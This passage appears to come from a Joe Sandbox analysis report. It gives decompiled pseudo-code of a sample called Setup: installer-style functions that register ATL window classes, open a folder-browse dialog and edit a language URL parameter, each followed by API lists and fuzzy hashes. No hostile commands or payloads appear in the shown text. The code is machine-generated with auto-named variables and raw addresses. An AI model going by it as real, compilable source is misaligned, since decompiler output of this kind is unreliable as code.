                                                                                                                                                              							_v196 = E00411B10(_t129);
                                                                                                                                                              							_v8 = 0xffffffff;
                                                                                                                                                              							E00417350( &_v48);
                                                                                                                                                              							_t84 = _v196;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					_t84 = 0x80004003;
                                                                                                                                                              				}
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return E0044F6C8(_t84, _t118, _v52 ^ _t150, _t142, _t148, _t149);
                                                                                                                                                              			}









































                                                                                                                                                              APIs
                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 00411BA8
                                                                                                                                                              • GetStockObject.GDI32(0000000D), ref: 00411BB9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ObjectStock
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3428563643-3916222277
                                                                                                                                                              • Opcode ID: 9b1a264db2cb702789ca39313b2bd7c77a772eeb26aab85bd3ebce3a5b6c2027
                                                                                                                                                              • Instruction ID: 7b6f1a3cd9b7b8c1032d4b7fe158fce2d146cc943c6786df9d5a46ae891e121d
                                                                                                                                                              • Opcode Fuzzy Hash: 9b1a264db2cb702789ca39313b2bd7c77a772eeb26aab85bd3ebce3a5b6c2027
                                                                                                                                                              • Instruction Fuzzy Hash: C0713A74D04218DFDB14DFA4D855BEEBBB0FF08310F10829AE629A7291DB785A84CF55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                              			E004F3900(void* __ebx, signed int* __ecx, signed int __edx, void* __edi, void* __fp0, intOrPtr _a8, signed int _a12) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				signed int _v17;
                                                                                                                                                              				signed int _v24;
                                                                                                                                                              				char _v28;
                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                              				signed int _v36;
                                                                                                                                                              				char _v64;
                                                                                                                                                              				char _v68;
                                                                                                                                                              				char _v100;
                                                                                                                                                              				intOrPtr _v104;
                                                                                                                                                              				char _v622;
                                                                                                                                                              				short _v624;
                                                                                                                                                              				signed int _v632;
                                                                                                                                                              				char _v640;
                                                                                                                                                              				intOrPtr _v652;
                                                                                                                                                              				intOrPtr _v656;
                                                                                                                                                              				char* _v660;
                                                                                                                                                              				WCHAR* _v664;
                                                                                                                                                              				intOrPtr _v668;
                                                                                                                                                              				char _v672;
                                                                                                                                                              				signed int _v676;
                                                                                                                                                              				char _v696;
                                                                                                                                                              				char _v700;
                                                                                                                                                              				char _v704;
                                                                                                                                                              				char _v708;
                                                                                                                                                              				char _v712;
                                                                                                                                                              				char _v744;
                                                                                                                                                              				char _v745;
                                                                                                                                                              				char _v746;
                                                                                                                                                              				signed int _v747;
                                                                                                                                                              				char _v780;
                                                                                                                                                              				char _v781;
                                                                                                                                                              				signed int* _v788;
                                                                                                                                                              				intOrPtr _v792;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				signed int _t148;
                                                                                                                                                              				signed int _t149;
                                                                                                                                                              				signed int* _t155;
                                                                                                                                                              				signed char _t157;
                                                                                                                                                              				void* _t161;
                                                                                                                                                              				short _t170;
                                                                                                                                                              				signed int _t174;
                                                                                                                                                              				void* _t180;
                                                                                                                                                              				signed int _t192;
                                                                                                                                                              				signed int _t194;
                                                                                                                                                              				signed int _t196;
                                                                                                                                                              				signed int* _t225;
                                                                                                                                                              				signed int _t226;
                                                                                                                                                              				signed int _t228;
                                                                                                                                                              				void* _t229;
                                                                                                                                                              				void* _t238;
                                                                                                                                                              				signed int* _t262;
                                                                                                                                                              				void* _t339;
                                                                                                                                                              				void* _t341;
                                                                                                                                                              				signed int _t342;
                                                                                                                                                              				void* _t343;
                                                                                                                                                              				void* _t344;
                                                                                                                                                              				void* _t346;
                                                                                                                                                              				void* _t352;
                                                                                                                                                              
                                                                                                                                                              				_t352 = __fp0;
                                                                                                                                                              				_t339 = __edi;
                                                                                                                                                              				_t323 = __edx;
                                                                                                                                                              				_t238 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x511013);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t344 = _t343 - 0x308;
                                                                                                                                                              				_t148 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t149 = _t148 ^ _t342;
                                                                                                                                                              				_v36 = _t149;
                                                                                                                                                              				_push(_t340);
                                                                                                                                                              				_push(_t149);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v788 = __ecx;
                                                                                                                                                              				if(_a8 == 1 || _a8 == 2) {
                                                                                                                                                              					if(E004150F0(0x5c1160) != _a12) {
                                                                                                                                                              						_v17 = E00404730(0x5c1160, 0xffffffff);
                                                                                                                                                              						E004D5110(_t238, _t339, _t340, _a12);
                                                                                                                                                              						_push(0);
                                                                                                                                                              						_push(0);
                                                                                                                                                              						_push(1);
                                                                                                                                                              						_push(0x2e);
                                                                                                                                                              						_push(0xffffffff);
                                                                                                                                                              						_t155 = E00416210( &(_v788[0x21]),  &_v704);
                                                                                                                                                              						_t323 =  *_t155;
                                                                                                                                                              						_push( *_t155);
                                                                                                                                                              						_push(0x5be034);
                                                                                                                                                              						E0049C910();
                                                                                                                                                              						_t344 = _t344 + 0x20;
                                                                                                                                                              						_t340 = _v17 & 0x000000ff;
                                                                                                                                                              						_t157 = E00404730(0x5c1160, 0xffffffff);
                                                                                                                                                              						__eflags = (_v17 & 0x000000ff) - (_t157 & 0x000000ff);
                                                                                                                                                              						if((_v17 & 0x000000ff) != (_t157 & 0x000000ff)) {
                                                                                                                                                              							_v24 = E00416BE0(E00416210( &(_v788[0x21]),  &_v708)) ^ 0x00003000;
                                                                                                                                                              							_t323 = _v24;
                                                                                                                                                              							__eflags =  &(_v788[0x21]);
                                                                                                                                                              							E00415FF0(E00416210( &(_v788[0x21]),  &_v712), 0xffffffec, _v24);
                                                                                                                                                              						}
                                                                                                                                                              						E00417910(L"UIL", E00434050( &_v745));
                                                                                                                                                              						_v8 = 0;
                                                                                                                                                              						_t161 = E004150F0(0x5c1160);
                                                                                                                                                              						E005018F0(E00501CE0(), __eflags,  &_v744, _t161);
                                                                                                                                                              						_v8 = 0xffffffff;
                                                                                                                                                              						E004176E0();
                                                                                                                                                              						__eflags = _a8 - 1;
                                                                                                                                                              						if(_a8 != 1) {
                                                                                                                                                              							E00417660( &_v68, E00406870( &(_v788[0x47]), _v788[0x4b]));
                                                                                                                                                              							_v8 = 2;
                                                                                                                                                              							_v32 = E00405200( &_v64, __eflags, L"&lang=", 0);
                                                                                                                                                              							__eflags = _v32 - 0xffffffff;
                                                                                                                                                              							if(_v32 != 0xffffffff) {
                                                                                                                                                              								_v32 = _v32 + 6;
                                                                                                                                                              								_v104 = E004468C0( &_v64, 0x26, _v32);
                                                                                                                                                              								__eflags = _v104 - 0xffffffff;
                                                                                                                                                              								if(_v104 == 0xffffffff) {
                                                                                                                                                              									_v104 = E0042E0C0( &_v64);
                                                                                                                                                              								}
                                                                                                                                                              								E004175C0(E00434050( &_v746));
                                                                                                                                                              								_v8 = 3;
                                                                                                                                                              								E00405370( &_v100, E004150F0(0x5c1160), 0xa);
                                                                                                                                                              								__eflags =  &_v100;
                                                                                                                                                              								if( &_v100 == 0) {
                                                                                                                                                              									_v792 = 0;
                                                                                                                                                              								} else {
                                                                                                                                                              									_v792 =  &_v100 + 4;
                                                                                                                                                              								}
                                                                                                                                                              								E004051A0( &_v64, _v32, _v104 - _v32, _v792);
                                                                                                                                                              								_t323 = _v788[0x4b];
                                                                                                                                                              								__eflags =  &(_v788[0x47]);
                                                                                                                                                              								E004181D0(E00406870( &(_v788[0x47]), _v788[0x4b]),  &_v68);
                                                                                                                                                              								E004F0B90(_t238, _v788, _v788[0x4b], _t339, _t340, _v788[0x4b]);
                                                                                                                                                              								_v8 = 2;
                                                                                                                                                              								E004176E0();
                                                                                                                                                              							}
                                                                                                                                                              							_v8 = 0xffffffff;
                                                                                                                                                              							E004176E0();
                                                                                                                                                              							goto L19;
                                                                                                                                                              						}
                                                                                                                                                              						E00414C90();
                                                                                                                                                              						_v8 = 1;
                                                                                                                                                              						_t225 = _v788;
                                                                                                                                                              						_t323 =  *( *(_t225 + 0x5c));
                                                                                                                                                              						_t226 =  *( *( *(_t225 + 0x5c)))( &(_v788[0x17]), E00434050( &_v28));
                                                                                                                                                              						__eflags = _t226;
                                                                                                                                                              						if(_t226 == 0) {
                                                                                                                                                              							_t228 = E0041D530( &_v28);
                                                                                                                                                              							__eflags = _t228;
                                                                                                                                                              							if(_t228 != 0) {
                                                                                                                                                              								_t229 = E0041D530( &_v28);
                                                                                                                                                              								E004F9110(_t238, E00404AE0(), _t323, _t339, _t340, __eflags, _t229);
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						_v8 = 0xffffffff;
                                                                                                                                                              						E0040D320();
                                                                                                                                                              						goto L19;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t170 = 0;
                                                                                                                                                              						goto L38;
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					L19:
                                                                                                                                                              					__eflags = _a8 - 3;
                                                                                                                                                              					if(_a8 == 3) {
                                                                                                                                                              						_v624 = 0;
                                                                                                                                                              						E00451D90(_t339,  &_v622, 0, 0x206);
                                                                                                                                                              						_t346 = _t344 + 0xc;
                                                                                                                                                              						E00416A10( &_v640);
                                                                                                                                                              						_v8 = 4;
                                                                                                                                                              						 *((intOrPtr*)( *((intOrPtr*)( *_v788 + 0x80))))(_v788, L"getBrowse", 0, 0,  &_v640);
                                                                                                                                                              						__eflags = _v632;
                                                                                                                                                              						if(_v632 != 0) {
                                                                                                                                                              							E0045184A( &_v624, _v632);
                                                                                                                                                              							_t346 = _t346 + 8;
                                                                                                                                                              						}
                                                                                                                                                              						_t192 = _v788[0x21];
                                                                                                                                                              						_v672 = _t192;
                                                                                                                                                              						_v668 = 0;
                                                                                                                                                              						_v664 =  &_v624;
                                                                                                                                                              						_v660 = L"Select Directory";
                                                                                                                                                              						_v656 = 3;
                                                                                                                                                              						_v652 = 0;
                                                                                                                                                              						_t323 =  &_v672;
                                                                                                                                                              						__imp__SHBrowseForFolderW( &_v672);
                                                                                                                                                              						_v676 = _t192;
                                                                                                                                                              						__eflags = _v676;
                                                                                                                                                              						if(_v676 != 0) {
                                                                                                                                                              							_t194 =  &_v624;
                                                                                                                                                              							__imp__SHGetPathFromIDListW(_v676, _t194);
                                                                                                                                                              							__eflags = _t194;
                                                                                                                                                              							if(_t194 != 0) {
                                                                                                                                                              								_t196 = StrStrIW( &_v624, E00403C30(0x5be390));
                                                                                                                                                              								__eflags = _t196;
                                                                                                                                                              								if(_t196 == 0) {
                                                                                                                                                              									PathAddBackslashW( &_v624);
                                                                                                                                                              									E0045181C( &_v624, E00403C30(0x5be390));
                                                                                                                                                              								}
                                                                                                                                                              								E004169E0( &_v696,  &_v624);
                                                                                                                                                              								_v8 = 5;
                                                                                                                                                              								_t323 =  *_v788;
                                                                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_v788 + 0x80))))(_v788, L"setBrowse",  &_v696, 1, 0);
                                                                                                                                                              								_v8 = 4;
                                                                                                                                                              								E00417430( &_v696);
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						_v8 = 0xffffffff;
                                                                                                                                                              						E00417430( &_v640);
                                                                                                                                                              					}
                                                                                                                                                              					__eflags = _a8 - 4;
                                                                                                                                                              					if(_a8 == 4) {
                                                                                                                                                              						__eflags = _a12;
                                                                                                                                                              						if(_a12 != 0) {
                                                                                                                                                              							E00416A50( &_v700,  *_a12);
                                                                                                                                                              							_v8 = 6;
                                                                                                                                                              							E00417910(_v700, E00434050( &_v781));
                                                                                                                                                              							_v8 = 7;
                                                                                                                                                              							_t180 = E004F2A70(_t238, _v788, _t339, _t340, _t352,  &_v780, 1);
                                                                                                                                                              							__eflags = _t180 - 0xa;
                                                                                                                                                              							_v747 = 0 | _t180 == 0x0000000a;
                                                                                                                                                              							_v8 = 6;
                                                                                                                                                              							E004176E0();
                                                                                                                                                              							_t323 = _v747 & 0x000000ff;
                                                                                                                                                              							__eflags = _v747 & 0x000000ff;
                                                                                                                                                              							if((_v747 & 0x000000ff) != 0) {
                                                                                                                                                              								__eflags =  &(_v788[0x4d]);
                                                                                                                                                              								E00415F90( &_v700, E00416A30( &(_v788[0x4d])));
                                                                                                                                                              								E00415F50( &_v700, _a12);
                                                                                                                                                              							}
                                                                                                                                                              							_v8 = 0xffffffff;
                                                                                                                                                              							E00417300( &_v700);
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					__eflags = _a8 - 5;
                                                                                                                                                              					if(_a8 == 5) {
                                                                                                                                                              						_t262 = _v788;
                                                                                                                                                              						_t323 =  *(_t262 + 0xf4) & 0x000000ff;
                                                                                                                                                              						__eflags =  *(_t262 + 0xf4) & 0x000000ff;
                                                                                                                                                              						if(( *(_t262 + 0xf4) & 0x000000ff) == 0) {
                                                                                                                                                              							_t323 = _v788;
                                                                                                                                                              							_t174 =  *((intOrPtr*)( *((intOrPtr*)( *_v788 + 0x28))))(_v788);
                                                                                                                                                              							__eflags = _t174;
                                                                                                                                                              							if(_t174 == 0) {
                                                                                                                                                              								 *0x5bdd20 = 2;
                                                                                                                                                              								E004EFD20(_v788);
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					_t170 = 0;
                                                                                                                                                              					__eflags = 0;
                                                                                                                                                              					L38:
                                                                                                                                                              					 *[fs:0x0] = _v16;
                                                                                                                                                              					_pop(_t341);
                                                                                                                                                              					return E0044F6C8(_t170, _t238, _v36 ^ _t342, _t323, _t339, _t341);
                                                                                                                                                              				}
                                                                                                                                                              			}































































                                                                                                                                                              0x004f3db2
                                                                                                                                                              0x004f3dc4
                                                                                                                                                              0x004f3dc9
                                                                                                                                                              0x004f3de9
                                                                                                                                                              0x004f3dee
                                                                                                                                                              0x004f3e01
                                                                                                                                                              0x004f3e08
                                                                                                                                                              0x004f3e0e
                                                                                                                                                              0x004f3e14
                                                                                                                                                              0x004f3e1e
                                                                                                                                                              0x004f3e23
                                                                                                                                                              0x004f3e2a
                                                                                                                                                              0x004f3e2c
                                                                                                                                                              0x004f3e34
                                                                                                                                                              0x004f3e46
                                                                                                                                                              0x004f3e55
                                                                                                                                                              0x004f3e55
                                                                                                                                                              0x004f3e5a
                                                                                                                                                              0x004f3e67
                                                                                                                                                              0x004f3e67
                                                                                                                                                              0x004f3db2
                                                                                                                                                              0x004f3e6c
                                                                                                                                                              0x004f3e70
                                                                                                                                                              0x004f3e72
                                                                                                                                                              0x004f3e78
                                                                                                                                                              0x004f3e7f
                                                                                                                                                              0x004f3e81
                                                                                                                                                              0x004f3e8b
                                                                                                                                                              0x004f3e95
                                                                                                                                                              0x004f3e97
                                                                                                                                                              0x004f3e99
                                                                                                                                                              0x004f3e9b
                                                                                                                                                              0x004f3eab
                                                                                                                                                              0x004f3eab
                                                                                                                                                              0x004f3e99
                                                                                                                                                              0x004f3e81
                                                                                                                                                              0x004f3eb0
                                                                                                                                                              0x004f3eb0
                                                                                                                                                              0x004f3eb2
                                                                                                                                                              0x004f3eb5
                                                                                                                                                              0x004f3ebd
                                                                                                                                                              0x004f3ecb
                                                                                                                                                              0x004f3ecb

                                                                                                                                                              APIs
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004F3AA9
                                                                                                                                                                • Part of subcall function 00416BE0: GetWindowLongW.USER32(00000000,000000EC), ref: 00416BEF
                                                                                                                                                                • Part of subcall function 00415FF0: SetWindowLongW.USER32 ref: 00416005
                                                                                                                                                              • _memset.LIBCMT ref: 004F3C21
                                                                                                                                                              • _wcscpy.LIBCMT ref: 004F3C79
                                                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 004F3CCE
                                                                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 004F3CF5
                                                                                                                                                              • StrStrIW.SHLWAPI(?,00000000,?,?,?,?,?,?,00000000), ref: 004F3D15
                                                                                                                                                              • PathAddBackslashW.SHLWAPI(?,?,?,?,?,?,?,00000000), ref: 004F3D26
                                                                                                                                                              • _wcscat.LIBCMT ref: 004F3D3E
                                                                                                                                                                • Part of subcall function 00416210: GetParent.USER32(-00000084), ref: 0041621D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LongPathWindow$BackslashBrowseFolderFromImmortalizeListParent_memset_wcscat_wcscpy
                                                                                                                                                              • String ID: &lang=$UIL$getBrowse$setBrowse
                                                                                                                                                              • API String ID: 2266113042-1634581760
                                                                                                                                                              • Opcode ID: fce5fad9a5188bc65b5fdd797f1f44c65d6c844206c7945e1528684482040bd4
                                                                                                                                                              • Instruction ID: 34c5fbb723b45cc8b5dfb8bcc746612e15db10846e2642f8c25bc08d6d22922c
                                                                                                                                                              • Opcode Fuzzy Hash: fce5fad9a5188bc65b5fdd797f1f44c65d6c844206c7945e1528684482040bd4
                                                                                                                                                              • Instruction Fuzzy Hash: 6BF16D709042189BCB28EFA5CC55BEEB779AF44304F1085AEE119A72D1DB786F84CF58
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                              			E00412D60(void* __edi, void* __eflags) {
                                                                                                                                                              				struct HINSTANCE__* _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				char _v24;
                                                                                                                                                              				int _v28;
                                                                                                                                                              				struct _WNDCLASSEXW _v76;
                                                                                                                                                              				signed int _v80;
                                                                                                                                                              				signed int _v84;
                                                                                                                                                              				struct HINSTANCE__* _v88;
                                                                                                                                                              				struct HINSTANCE__* _v92;
                                                                                                                                                              				signed int _t62;
                                                                                                                                                              				WCHAR* _t70;
                                                                                                                                                              				struct HINSTANCE__* _t75;
                                                                                                                                                              				WCHAR* _t77;
                                                                                                                                                              				void* _t112;
                                                                                                                                                              				signed int _t113;
                                                                                                                                                              				void* _t117;
                                                                                                                                                              
                                                                                                                                                              				_t117 = __eflags;
                                                                                                                                                              				_t111 = __edi;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x5183b8);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t62 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t62 ^ _t113);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				E00416D10( &_v24, 0x5bc850, 0);
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				if(E00416DB0( &_v24, _t117) >= 0) {
                                                                                                                                                              					 *0x5c1b04 = RegisterWindowMessageW(L"WM_ATLGETHOST");
                                                                                                                                                              					 *0x5c1b08 = RegisterWindowMessageW(L"WM_ATLGETCONTROL");
                                                                                                                                                              					_v76.cbSize = 0x30;
                                                                                                                                                              					_t70 = E0040B160();
                                                                                                                                                              					_v28 = GetClassInfoExW(E004150F0(0x5bc878), _t70,  &_v76);
                                                                                                                                                              					__eflags = _v28;
                                                                                                                                                              					if(_v28 == 0) {
                                                                                                                                                              						_v76.cbSize = 0x30;
                                                                                                                                                              						_v76.style = 8;
                                                                                                                                                              						_v76.lpfnWndProc =  &M004F1120;
                                                                                                                                                              						_v76.cbClsExtra = 0;
                                                                                                                                                              						_v76.cbWndExtra = 0;
                                                                                                                                                              						_v76.hInstance = E004150F0(0x5bc878);
                                                                                                                                                              						_v76.hIcon = 0;
                                                                                                                                                              						_v76.hCursor = LoadCursorW(0, 0x7f00);
                                                                                                                                                              						_v76.hbrBackground = 6;
                                                                                                                                                              						_v76.lpszMenuName = 0;
                                                                                                                                                              						_v76.lpszClassName = E0040B160();
                                                                                                                                                              						_v76.hIconSm = 0;
                                                                                                                                                              						_v80 = RegisterClassExW( &_v76);
                                                                                                                                                              						__eflags = _v80 & 0x0000ffff;
                                                                                                                                                              						if((_v80 & 0x0000ffff) == 0) {
                                                                                                                                                              							_v28 = 0;
                                                                                                                                                              						} else {
                                                                                                                                                              							E00414570(0x5bc86c, __edi, _t112,  &_v80);
                                                                                                                                                              							_v28 = 1;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					__eflags = _v28;
                                                                                                                                                              					if(_v28 != 0) {
                                                                                                                                                              						E00451D90(_t111,  &_v76, 0, 0x30);
                                                                                                                                                              						_v76.cbSize = 0x30;
                                                                                                                                                              						_t77 = E00412D50();
                                                                                                                                                              						_v28 = GetClassInfoExW(E004150F0(0x5bc878), _t77,  &_v76);
                                                                                                                                                              						__eflags = _v28;
                                                                                                                                                              						if(_v28 == 0) {
                                                                                                                                                              							_v76.cbSize = 0x30;
                                                                                                                                                              							_v76.style = 8;
                                                                                                                                                              							_v76.lpfnWndProc =  &M004F1DE0;
                                                                                                                                                              							_v76.cbClsExtra = 0;
                                                                                                                                                              							_v76.cbWndExtra = 0;
                                                                                                                                                              							_v76.hInstance = E004150F0(0x5bc878);
                                                                                                                                                              							_v76.hIcon = 0;
                                                                                                                                                              							_v76.hCursor = LoadCursorW(0, 0x7f00);
                                                                                                                                                              							_v76.hbrBackground = 6;
                                                                                                                                                              							_v76.lpszMenuName = 0;
                                                                                                                                                              							_v76.lpszClassName = E00412D50();
                                                                                                                                                              							_v76.hIconSm = 0;
                                                                                                                                                              							_v84 = RegisterClassExW( &_v76);
                                                                                                                                                              							__eflags = _v84 & 0x0000ffff;
                                                                                                                                                              							if((_v84 & 0x0000ffff) == 0) {
                                                                                                                                                              								_v28 = 0;
                                                                                                                                                              							} else {
                                                                                                                                                              								E00414570(0x5bc86c, _t111, _t112,  &_v84);
                                                                                                                                                              								_v28 = 1;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					_v92 = _v28;
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E00416D90( &_v24);
                                                                                                                                                              					_t75 = _v92;
                                                                                                                                                              					goto L12;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v88 = 0;
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E00416D90( &_v24);
                                                                                                                                                              					_t75 = _v88;
                                                                                                                                                              					L12:
                                                                                                                                                              					 *[fs:0x0] = _v16;
                                                                                                                                                              					return _t75;
                                                                                                                                                              				}
                                                                                                                                                              			}




















                                                                                                                                                              APIs
                                                                                                                                                              • RegisterWindowMessageW.USER32(WM_ATLGETHOST,005BC850,00000000,DDD124F9,?,?,?,?,?,?,?,?,?,00000000,005183B8,000000FF), ref: 00412DCA
                                                                                                                                                              • RegisterWindowMessageW.USER32(WM_ATLGETCONTROL,?,?,?,?,?,?,?,?,?,00000000,005183B8,000000FF,?,0040A2D8,00409C40), ref: 00412DDA
                                                                                                                                                              • GetClassInfoExW.USER32 ref: 00412E01
                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00412E52
                                                                                                                                                              • RegisterClassExW.USER32 ref: 00412E7C
                                                                                                                                                              • _memset.LIBCMT ref: 00412EBE
                                                                                                                                                              • GetClassInfoExW.USER32 ref: 00412EE2
                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00412F33
                                                                                                                                                              • RegisterClassExW.USER32 ref: 00412F5D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ClassRegister$CursorInfoLoadMessageWindow$_memset
                                                                                                                                                              • String ID: 0$WM_ATLGETCONTROL$WM_ATLGETHOST
                                                                                                                                                              • API String ID: 1979984324-556241384
                                                                                                                                                              • Opcode ID: 98de1ba3a8d8b56333b70a12dcfd8303c53db3e348be417c87b99f726e3b13e3
                                                                                                                                                              • Instruction ID: 258aefe00074db0959d0ba01dbe9fda0cd94ce505775ef1cbfd49d6b95fdbca9
                                                                                                                                                              • Opcode Fuzzy Hash: 98de1ba3a8d8b56333b70a12dcfd8303c53db3e348be417c87b99f726e3b13e3
                                                                                                                                                              • Instruction Fuzzy Hash: AE51E4B0D002099FEB10DFE5D9597EEBFB4FF08305F10411AE505B6290EBB95989CBA9
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                              			E0042B200(intOrPtr __ecx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                              				char _v64;
                                                                                                                                                              				char _v92;
                                                                                                                                                              				intOrPtr _v96;
                                                                                                                                                              				signed int _t94;
                                                                                                                                                              				intOrPtr* _t103;
                                                                                                                                                              				intOrPtr* _t104;
                                                                                                                                                              				char* _t107;
                                                                                                                                                              				intOrPtr* _t113;
                                                                                                                                                              				intOrPtr* _t117;
                                                                                                                                                              				char* _t122;
                                                                                                                                                              				intOrPtr* _t125;
                                                                                                                                                              				intOrPtr* _t134;
                                                                                                                                                              				intOrPtr* _t137;
                                                                                                                                                              				intOrPtr* _t149;
                                                                                                                                                              				char* _t156;
                                                                                                                                                              				intOrPtr* _t159;
                                                                                                                                                              				intOrPtr* _t168;
                                                                                                                                                              				intOrPtr* _t171;
                                                                                                                                                              				intOrPtr* _t184;
                                                                                                                                                              				intOrPtr* _t187;
                                                                                                                                                              				intOrPtr* _t188;
                                                                                                                                                              				signed int _t291;
                                                                                                                                                              				void* _t292;
                                                                                                                                                              				void* _t293;
                                                                                                                                                              				void* _t295;
                                                                                                                                                              				void* _t300;
                                                                                                                                                              				void* _t304;
                                                                                                                                                              				void* _t306;
                                                                                                                                                              				void* _t323;
                                                                                                                                                              				void* _t325;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x517298);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t293 = _t292 - 0x50;
                                                                                                                                                              				_t94 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t94 ^ _t291);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v96 = __ecx;
